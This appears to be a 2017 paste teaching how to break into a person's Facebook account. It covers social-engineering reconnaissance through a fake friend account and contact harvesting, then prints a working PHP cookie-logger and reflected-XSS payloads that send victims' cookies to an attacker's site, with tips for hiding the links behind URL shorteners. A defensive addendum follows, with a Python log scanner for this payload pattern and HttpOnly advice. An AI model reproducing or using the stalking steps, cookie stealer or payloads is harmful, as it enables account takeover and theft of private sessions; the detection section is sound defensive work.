--DSR--

F:

May 16th, 2017
  1. Now we are going to talk about "Facebook hacking".
  2. We start with the attack types that we CAN'T do:
  3. Just forget about SQLi and malware.
  4.  
  5. The easiest and most realistic way to get a user's Facebook password is social engineering or phishing.
  6. And that's what we are going to talk about today.
  7.  
  8. So let's break down the social engineering steps.
  9. First off, you want to harvest as much information about the target as possible.
  10. Create a fake Facebook account, add the target as a friend, and collect all the info you need.
  11. Open a Yahoo email account and import contacts from Facebook; if you're lucky, his email will leak.
  12. Use Google and Maltego to find accounts associated with him.
  13.  
  14. If you found any email, look it up on haveibeenpwned.
  15.  
  16. If you have not found any password yet, I would go for phishing.
  17. If you have not read my report on XSS, you need to do that now.
  18.  
  19. Use the cookie hijacking as explained in the XSS tour.
  20. And who knows, you might be able to find an XSS vuln on Facebook; this you have to find on your own.
  21. No one will ever share that XSS vuln with you.
  22.  
  23.  
  24. If you missed my XSS writeup on cookie hijacking:
  25.  
  26.  
  27. Cookie hijacking:
  28. Put cookie logger script on your webpage and insert it to javascript into xss vulnerable with the cookielogger script address :)
  29. The script will handle the rest.
  30.  
  31. cookielogger.php
  32. <*?php
  33.  
  34. function GetIP()
  35. {
  36. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  37. $ip = getenv("HTTP_CLIENT_IP");
  38. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  39. $ip = getenv("HTTP_X_FORWARDED_FOR");
  40. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  41. $ip = getenv("REMOTE_ADDR");
  42. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  43. $ip = $_SERVER['REMOTE_ADDR'];
  44. else
  45. $ip = "unknown";
  46. return($ip);
  47. }
  48.  
  49. function logData()
  50. {
  51. $ipLog="log.txt";
  52. $cookie = $_SERVER['QUERY_STRING'];
  53. $register_globals = (bool) ini_get('register_gobals');
  54. if ($register_globals) $ip = getenv('REMOTE_ADDR');
  55. else $ip = GetIP();
  56.  
  57. $rem_port = $_SERVER['REMOTE_PORT'];
  58. $user_agent = $_SERVER['HTTP_USER_AGENT'];
  59. $rqst_method = $_SERVER['METHOD'];
  60. $rem_host = $_SERVER['REMOTE_HOST'];
  61. $referer = $_SERVER['HTTP_REFERER'];
  62. $date=date ("l dS of F Y h:i:s A");
  63. $log=fopen("$ipLog", "a+");
  64.  
  65. if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
  66. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
  67. ");
  68. else
  69. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
  70. fclose($log);
  71. }
  72.  
  73. logData();
  74.  
  75. ?>
  76.  
  77.  
  78. Make a tlog.txt and put both of them on your webspace and set "chmod 777".
  79. Inject the following code in your target
  80.  
  81. website:
  82. http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
  83.  
  84. <script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
  85.  
  86. use url shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim
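
For defenders, the reflected-XSS cookie redirect described above leaves a recognizable trace in the vulnerable site's own access log. The following is an added example, not part of the original paste: a small detector that percent-decodes each request's query string (including double encoding) and flags script tags that reference `document.cookie`. The log lines, IP addresses and the `collector.example` host are constructed sample data, and the patterns cover only the payload shape shown in this paste.

```python
import re
from urllib.parse import unquote

# Request field of a Combined Log Format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')
SCRIPT_RE = re.compile(r"<\s*script\b", re.I)
COOKIE_RE = re.compile(r"document\s*\.\s*cookie", re.I)

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/May/2017:10:00:01 +0000] "GET /google.php?search=cookie+recipes HTTP/1.1" 200 512',
    '198.51.100.9 - - [16/May/2017:10:00:05 +0000] "GET /google.php?search=%3Cscript%3Elocation.href%3D%27http%3A%2F%2Fcollector.example%2Fc%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 734',
    '198.51.100.9 - - [16/May/2017:10:00:09 +0000] "GET /google.php?search=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 640',
    '192.0.2.44 - - [16/May/2017:10:01:12 +0000] "GET /docs/document.cookie.html HTTP/1.1" 200 2048',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, verdict) for a suspicious request line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = m.group("target").partition("?")[2]
    decoded = fully_decode(query)
    if not query or not SCRIPT_RE.search(decoded):
        return None
    verdict = "cookie-exfil" if COOKIE_RE.search(decoded) else "script-injection"
    return (m.group("ip"), verdict)

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:17} from {ip}")
```

Detection complements prevention: a session cookie set with the `HttpOnly` attribute is not exposed through `document.cookie`, and output encoding of the reflected parameter removes the injection point itself.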